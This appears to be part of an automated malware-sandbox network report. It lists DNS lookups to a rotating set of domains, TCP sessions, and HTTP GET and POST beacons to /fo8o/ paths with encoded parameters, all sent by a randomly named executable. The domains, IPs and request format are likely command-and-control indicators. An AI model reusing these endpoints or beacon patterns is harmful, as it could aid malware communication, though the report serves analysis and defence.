                                                    Jun 9, 2024 18:00:51.502248049 CEST4972680192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:51.507117033 CEST804972685.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:52.463092089 CEST804972685.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:52.507342100 CEST4972680192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:52.620608091 CEST804972685.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:52.620680094 CEST4972680192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:53.007380962 CEST4972680192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:54.027707100 CEST4972780192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:54.032686949 CEST804972785.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:54.032772064 CEST4972780192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:54.035046101 CEST4972780192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:54.039967060 CEST804972785.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:54.040088892 CEST804972785.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:54.995521069 CEST804972785.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:55.038606882 CEST4972780192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:55.153711081 CEST804972785.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:55.153992891 CEST4972780192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:55.541603088 CEST4972780192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:56.557746887 CEST4972880192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:56.562791109 CEST804972885.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:56.562973022 CEST4972880192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:56.564965010 CEST4972880192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:56.569957972 CEST804972885.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:57.476320028 CEST804972885.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:57.525603056 CEST4972880192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:57.633881092 CEST804972885.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:00:57.637728930 CEST4972880192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:57.640501976 CEST4972880192.168.2.1185.159.66.93
                                                    Jun 9, 2024 18:00:57.645540953 CEST804972885.159.66.93192.168.2.11
                                                    Jun 9, 2024 18:01:02.675687075 CEST4972980192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:02.680711031 CEST804972991.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:02.682894945 CEST4972980192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:02.682894945 CEST4972980192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:02.688028097 CEST804972991.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:03.534750938 CEST804972991.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:03.587630033 CEST4972980192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:03.661758900 CEST804972991.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:03.661921024 CEST4972980192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:04.194859028 CEST4972980192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:05.217161894 CEST4973080192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:05.222287893 CEST804973091.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:05.222868919 CEST4973080192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:05.225583076 CEST4973080192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:05.230540037 CEST804973091.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:06.085066080 CEST804973091.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:06.194917917 CEST4973080192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:06.213545084 CEST804973091.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:06.213632107 CEST4973080192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:06.726043940 CEST4973080192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:07.744940996 CEST4973180192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:07.750610113 CEST804973191.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:07.750797987 CEST4973180192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:07.752844095 CEST4973180192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:07.758384943 CEST804973191.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:07.758611917 CEST804973191.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:09.257596016 CEST4973180192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:09.262866974 CEST804973191.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:09.262974977 CEST4973180192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:10.279824018 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:10.284945965 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:10.285039902 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:10.287750006 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:10.292670965 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.175139904 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.175154924 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.175173044 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.175190926 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.175196886 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.175211906 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.175220013 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.175234079 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.175242901 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.175319910 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.175339937 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:11.175407887 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:11.177392006 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:11.180572033 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.180588007 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.180607080 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.180702925 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:11.228507042 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:11.302831888 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.302846909 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.302856922 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.302864075 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.302875042 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.302882910 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.302982092 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.302989960 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.303005934 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.303014040 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.303040981 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:11.303040981 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:11.303766966 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.303823948 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:11.351342916 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:11.430166960 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:11.433824062 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:11.461299896 CEST4973280192.168.2.1191.195.240.94
                                                    Jun 9, 2024 18:01:11.466516018 CEST804973291.195.240.94192.168.2.11
                                                    Jun 9, 2024 18:01:24.690820932 CEST4973380192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:24.695827007 CEST804973366.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:24.695934057 CEST4973380192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:24.725614071 CEST4973380192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:24.730588913 CEST804973366.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:25.377434969 CEST804973366.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:25.410075903 CEST804973366.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:25.410288095 CEST4973380192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:26.257430077 CEST4973380192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:27.441965103 CEST4973480192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:27.447707891 CEST804973466.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:27.456864119 CEST4973480192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:27.478238106 CEST4973480192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:27.483237982 CEST804973466.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:28.142008066 CEST804973466.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:28.174985886 CEST804973466.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:28.175040007 CEST4973480192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:28.991729975 CEST4973480192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:30.012731075 CEST4973580192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:30.017972946 CEST804973566.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:30.018064976 CEST4973580192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:30.020436049 CEST4973580192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:30.025454044 CEST804973566.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:30.025491953 CEST804973566.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:30.703097105 CEST804973566.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:30.738014936 CEST804973566.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:30.744818926 CEST4973580192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:31.525650978 CEST4973580192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:32.544203997 CEST4973680192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:32.549252987 CEST804973666.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:32.549329042 CEST4973680192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:32.551182032 CEST4973680192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:32.556085110 CEST804973666.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:33.234950066 CEST804973666.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:33.267563105 CEST804973666.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:33.268455029 CEST4973680192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:33.269386053 CEST4973680192.168.2.1166.29.149.46
                                                    Jun 9, 2024 18:01:33.274374962 CEST804973666.29.149.46192.168.2.11
                                                    Jun 9, 2024 18:01:38.357891083 CEST4973780192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:38.362881899 CEST8049737195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:38.362957001 CEST4973780192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:38.365076065 CEST4973780192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:38.370029926 CEST8049737195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:39.218137980 CEST8049737195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:39.272906065 CEST4973780192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:39.343713045 CEST8049737195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:39.345693111 CEST4973780192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:39.866868973 CEST4973780192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:40.885606050 CEST4973880192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:40.890722036 CEST8049738195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:40.891128063 CEST4973880192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:40.892910004 CEST4973880192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:40.897958994 CEST8049738195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:41.741810083 CEST8049738195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:41.788527012 CEST4973880192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:41.866857052 CEST8049738195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:41.866945982 CEST4973880192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:42.398169041 CEST4973880192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:43.433397055 CEST4973980192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:43.438647985 CEST8049739195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:43.440526009 CEST4973980192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:43.443393946 CEST4973980192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:43.448308945 CEST8049739195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:43.448515892 CEST8049739195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:44.304589987 CEST8049739195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:44.351032972 CEST4973980192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:44.429025888 CEST8049739195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:44.429241896 CEST4973980192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:44.945262909 CEST4973980192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:45.965198994 CEST4974080192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:45.970383883 CEST8049740195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:45.970479965 CEST4974080192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:45.972829103 CEST4974080192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:45.977741957 CEST8049740195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:46.826838017 CEST8049740195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:46.885627031 CEST4974080192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:46.950860977 CEST8049740195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:46.953849077 CEST4974080192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:46.957609892 CEST4974080192.168.2.11195.110.124.133
                                                    Jun 9, 2024 18:01:46.962574005 CEST8049740195.110.124.133192.168.2.11
                                                    Jun 9, 2024 18:01:52.323436022 CEST4974180192.168.2.1123.227.38.74
                                                    Jun 9, 2024 18:01:52.328496933 CEST804974123.227.38.74192.168.2.11
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                    Jun 9, 2024 18:02:41.465651035 CEST5506953192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:02:41.479162931 CEST53550691.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:02:49.544126034 CEST5615853192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:02:49.563745022 CEST53561581.1.1.1192.168.2.11
                                                    Jun 9, 2024 18:03:03.293694019 CEST5462753192.168.2.111.1.1.1
                                                    Jun 9, 2024 18:03:03.310996056 CEST53546271.1.1.1192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jun 9, 2024 17:59:49.049603939 CEST | 192.168.2.11 | 1.1.1.1 | 0x294c | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:00:05.669600010 CEST | 192.168.2.11 | 1.1.1.1 | 0x1358 | Standard query (0) | www.kasegitai.tokyo | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:00:20.542429924 CEST | 192.168.2.11 | 1.1.1.1 | 0xac29 | Standard query (0) | www.goldenjade-travel.com | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:00:35.073977947 CEST | 192.168.2.11 | 1.1.1.1 | 0x7eb8 | Standard query (0) | www.antonio-vivaldi.mobi | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:00:48.856306076 CEST | 192.168.2.11 | 1.1.1.1 | 0x971c | Standard query (0) | www.magmadokum.com | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:01:02.657613039 CEST | 192.168.2.11 | 1.1.1.1 | 0x389d | Standard query (0) | www.rssnewscast.com | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:01:16.480819941 CEST | 192.168.2.11 | 1.1.1.1 | 0x5612 | Standard query (0) | www.liangyuen528.com | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:01:24.627156019 CEST | 192.168.2.11 | 1.1.1.1 | 0xb77 | Standard query (0) | www.techchains.info | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:01:38.277000904 CEST | 192.168.2.11 | 1.1.1.1 | 0xb2ab | Standard query (0) | www.elettrosistemista.zip | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:01:51.964962959 CEST | 192.168.2.11 | 1.1.1.1 | 0x3885 | Standard query (0) | www.donnavariedades.com | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:02:05.776236057 CEST | 192.168.2.11 | 1.1.1.1 | 0xcb1c | Standard query (0) | www.660danm.top | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:02:19.778551102 CEST | 192.168.2.11 | 1.1.1.1 | 0x4bc4 | Standard query (0) | www.empowermedeco.com | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:02:33.121023893 CEST | 192.168.2.11 | 1.1.1.1 | 0x8c07 | Standard query (0) | www.joyesi.xyz | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:02:41.465651035 CEST | 192.168.2.11 | 1.1.1.1 | 0xd73 | Standard query (0) | www.k9vyp11no3.cfd | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:02:49.544126034 CEST | 192.168.2.11 | 1.1.1.1 | 0x3cef | Standard query (0) | www.shenzhoucui.com | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:03:03.293694019 CEST | 192.168.2.11 | 1.1.1.1 | 0x6563 | Standard query (0) | www.b301.space | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jun 9, 2024 17:59:49.444494963 CEST | 1.1.1.1 | 192.168.2.11 | 0x294c | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:00:06.182532072 CEST | 1.1.1.1 | 192.168.2.11 | 0x1358 | No error (0) | www.kasegitai.tokyo | | 202.172.28.202 | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:00:20.919827938 CEST | 1.1.1.1 | 192.168.2.11 | 0xac29 | No error (0) | www.goldenjade-travel.com | | 116.50.37.244 | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:00:35.100151062 CEST | 1.1.1.1 | 192.168.2.11 | 0x7eb8 | No error (0) | www.antonio-vivaldi.mobi | | 46.30.213.191 | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:00:48.958861113 CEST | 1.1.1.1 | 192.168.2.11 | 0x971c | No error (0) | www.magmadokum.com | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 9, 2024 18:00:48.958861113 CEST | 1.1.1.1 | 192.168.2.11 | 0x971c | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 9, 2024 18:00:48.958861113 CEST | 1.1.1.1 | 192.168.2.11 | 0x971c | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:01:02.671101093 CEST | 1.1.1.1 | 192.168.2.11 | 0x389d | No error (0) | www.rssnewscast.com | | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:01:16.516200066 CEST | 1.1.1.1 | 192.168.2.11 | 0x5612 | Server failure (2) | www.liangyuen528.com | none | none | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:01:24.649569988 CEST | 1.1.1.1 | 192.168.2.11 | 0xb77 | No error (0) | www.techchains.info | | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:01:38.355047941 CEST | 1.1.1.1 | 192.168.2.11 | 0xb2ab | No error (0) | www.elettrosistemista.zip | elettrosistemista.zip | | CNAME (Canonical name) | IN (0x0001) | false
Jun 9, 2024 18:01:38.355047941 CEST | 1.1.1.1 | 192.168.2.11 | 0xb2ab | No error (0) | elettrosistemista.zip | | 195.110.124.133 | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:01:52.321110010 CEST | 1.1.1.1 | 192.168.2.11 | 0x3885 | No error (0) | www.donnavariedades.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 9, 2024 18:01:52.321110010 CEST | 1.1.1.1 | 192.168.2.11 | 0x3885 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:02:06.166100025 CEST | 1.1.1.1 | 192.168.2.11 | 0xcb1c | No error (0) | www.660danm.top | | 34.111.148.214 | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:02:06.166100025 CEST | 1.1.1.1 | 192.168.2.11 | 0xcb1c | No error (0) | www.660danm.top | | 34.120.249.181 | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:02:19.832824945 CEST | 1.1.1.1 | 192.168.2.11 | 0x4bc4 | No error (0) | www.empowermedeco.com | empowermedeco.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 9, 2024 18:02:19.832824945 CEST | 1.1.1.1 | 192.168.2.11 | 0x4bc4 | No error (0) | empowermedeco.com | | 217.196.55.202 | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:02:33.340080023 CEST | 1.1.1.1 | 192.168.2.11 | 0x8c07 | Server failure (2) | www.joyesi.xyz | none | none | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:02:41.479162931 CEST | 1.1.1.1 | 192.168.2.11 | 0xd73 | Name error (3) | www.k9vyp11no3.cfd | none | none | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:02:49.563745022 CEST | 1.1.1.1 | 192.168.2.11 | 0x3cef | No error (0) | www.shenzhoucui.com | | 104.206.198.212 | A (IP address) | IN (0x0001) | false
Jun 9, 2024 18:03:03.310996056 CEST | 1.1.1.1 | 192.168.2.11 | 0x6563 | No error (0) | www.b301.space | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
                                                    • www.3xfootball.com
                                                    • www.kasegitai.tokyo
                                                    • www.goldenjade-travel.com
                                                    • www.antonio-vivaldi.mobi
                                                    • www.magmadokum.com
                                                    • www.rssnewscast.com
                                                    • www.techchains.info
                                                    • www.elettrosistemista.zip
                                                    • www.donnavariedades.com
                                                    • www.660danm.top
                                                    • www.empowermedeco.com
                                                    • www.shenzhoucui.com
                                                    • www.b301.space
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49711 | 154.215.72.110 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
Timestamp | Bytes transferred | Direction | Data
Jun 9, 2024 17:59:49.461067915 CEST | 506 | OUT | GET /fo8o/?Zl4h1=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.3xfootball.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jun 9, 2024 17:59:50.418404102 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 15:59:50 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 548
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49712 | 202.172.28.202 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
Timestamp | Bytes transferred | Direction | Data
Jun 9, 2024 18:00:06.192022085 CEST | 779 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.kasegitai.tokyo
                                                    Origin: http://www.kasegitai.tokyo
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.kasegitai.tokyo/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
